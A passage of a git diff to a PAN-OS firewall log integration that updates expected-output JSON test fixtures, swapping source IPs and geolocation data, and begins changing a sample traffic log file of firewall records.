"ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546043231Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079565Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13733,25 +13757,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13792,7 +13818,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZzHOd7AFzjbGqVCj9S3bTNHFX4Q=", + "community_id": "1:+Fw7pXGMYsoIHJl6XCvpSnc+ktw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -13827,15 +13853,15 @@ "jordy" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546050389Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079568400Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13872,25 +13898,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.198" + "ip": "175.16.199.1" }, - "message": "74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13931,7 +13959,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uH37XIov0Sgv5kARW8dP9vrOs7w=", + "community_id": "1:1Gs2F0v1jt3hXj1u3g2EOeRAzcQ=", "transport": "tcp", "application": "google-analytics", "direction": "outbound" @@ -13966,15 +13994,15 @@ "jordy" ], "ip": [ - "74.125.224.198", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546057533Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079572800Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -14011,25 +14039,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -14070,7 +14100,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9jnjFXERN6VFakI1U/qwzyqifzg=", + "community_id": "1:JXDqxOKk8OSmF1oSccqMIKzY9uk=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -14105,15 +14135,15 @@ "jordy" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546064650Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079577900Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log index 70d2804a712..2857446f693 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log @@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 